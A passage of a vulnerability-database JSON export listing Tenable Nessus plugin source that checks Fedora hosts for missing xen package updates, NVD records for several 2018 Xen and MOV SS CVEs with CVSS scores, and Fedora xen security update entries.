audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"xen-4.9.2-2.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T10:21:54", "description": "Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 11, "cvss3": {"score": 5.6, "vector": "AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : xen (2018-dbebca30d0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-DBEBCA30D0.NASL", "href": "https://www.tenable.com/plugins/nessus/120843", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-dbebca30d0.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120843);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\");\n script_xref(name:\"FEDORA\", value:\"2018-dbebca30d0\");\n\n script_name(english:\"Fedora 28 : xen (2018-dbebca30d0)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-dbebca30d0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-10472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"xen-4.10.0-9.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:22:09", "description": "Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 6.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H"}, "published": "2018-05-14T00:00:00", "title": "Fedora 26 : xen (2018-eb69078020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472"], "modified": "2018-05-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-EB69078020.NASL", "href": "https://www.tenable.com/plugins/nessus/109746", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-eb69078020.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109746);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\");\n script_xref(name:\"FEDORA\", value:\"2018-eb69078020\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"Fedora 26 : xen (2018-eb69078020)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-eb69078020\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"xen-4.8.3-4.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:52:23", "description": "An issue was discovered in Xen through 4.10.x allowing x86 PV guest OS users to cause a denial of service (out-of-bounds zero write and hypervisor crash) via unexpected INT 80 processing, because of an incorrect fix for CVE-2017-5754.", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-04-27T15:29:00", "title": "CVE-2018-10471", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10471"], "modified": "2018-10-31T10:30:00", "cpe": ["cpe:/o:xen:xen:4.10.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10471", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10471", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:23", "description": "An issue was discovered in Xen through 4.10.x allowing x86 HVM guest OS users (in certain configurations) to read arbitrary dom0 files via QMP live insertion of a CDROM, in conjunction with specifying the target file as the backing file of a snapshot.", "edition": 6, "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-04-27T15:29:00", "title": "CVE-2018-10472", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10472"], "modified": "2018-10-31T10:30:00", "cpe": ["cpe:/o:xen:xen:4.10.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10472", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:x86:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:24", "description": "An issue was discovered in Xen through 4.10.x allowing x86 HVM guest OS users to cause a denial of service (unexpectedly high interrupt number, array overrun, and hypervisor crash) or possibly gain hypervisor privileges by setting up an HPET timer to deliver interrupts in IO-APIC mode, aka vHPET interrupt injection.", "edition": 7, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-05-10T23:29:00", "title": "CVE-2018-10982", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10982"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:xen:xen:4.10.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10982", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:x86:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:24", "description": "An issue was discovered in Xen through 4.10.x allowing x86 HVM guest OS users to cause a denial of service (host OS infinite loop) in situations where a QEMU device model attempts to make invalid transitions between states of a request.", "edition": 7, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-05-10T22:29:00", "title": "CVE-2018-10981", "type": "cve", "cwe": ["CWE-835"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10981"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:xen:xen:4.10.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10981", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10981", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:43", "description": "A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-08T18:29:00", "title": "CVE-2018-8897", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8897"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:citrix:xenserver:7.4", "cpe:/o:synology:diskstation_manager:6.1", "cpe:/o:synology:diskstation_manager:6.0", "cpe:/a:citrix:xenserver:7.2", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:citrix:xenserver:6.0.2", "cpe:/o:redhat:enterprise_virtualization_manager:3.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:synology:diskstation_manager:5.2", "cpe:/a:citrix:xenserver:7.0", "cpe:/o:xen:xen:-", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:citrix:xenserver:7.3", "cpe:/a:citrix:xenserver:6.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:citrix:xenserver:6.2.0", "cpe:/a:citrix:xenserver:7.1", "cpe:/a:synology:skynas:-", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-8897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8897", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:synology:diskstation_manager:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:citrix:xenserver:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:-:*:*:*:*:*:x86:*", "cpe:2.3:a:citrix:xenserver:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_virtualization_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:synology:skynas:-:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:synology:diskstation_manager:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:synology:diskstation_manager:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-05-26T20:47:24", "published": "2018-05-26T20:47:24", "id": "FEDORA:6CE076015F62", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-3.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-06-29T08:43:54", "published": "2018-06-29T08:43:54", "id": "FEDORA:6E66862A5C82", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-4.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-3639", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-07-03T16:56:43", "published": "2018-07-03T16:56:43", "id": "FEDORA:6A9A16095B29", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-5.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-15468", "CVE-2018-15469", "CVE-2018-15470", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-08-30T04:57:39", "published": "2018-08-30T04:57:39", "id": "FEDORA:E5291607602A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-6.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-15468", "CVE-2018-15469", "CVE-2018-15470", "CVE-2018-18883", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-11-11T03:12:54", "published": "2018-11-11T03:12:54", "id": "FEDORA:37B8362B00D0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.2-2.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-15468", "CVE-2018-15469", "CVE-2018-15470", "CVE-2018-18883", "CVE-2018-19961", "CVE-2018-19962", "CVE-2018-19965", "CVE-2018-19966", "CVE-2018-19967", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2019-03-21T21:09:08", "published": "2019-03-21T21:09:08", "id": "FEDORA:5267F604C2BD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.3-2.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": 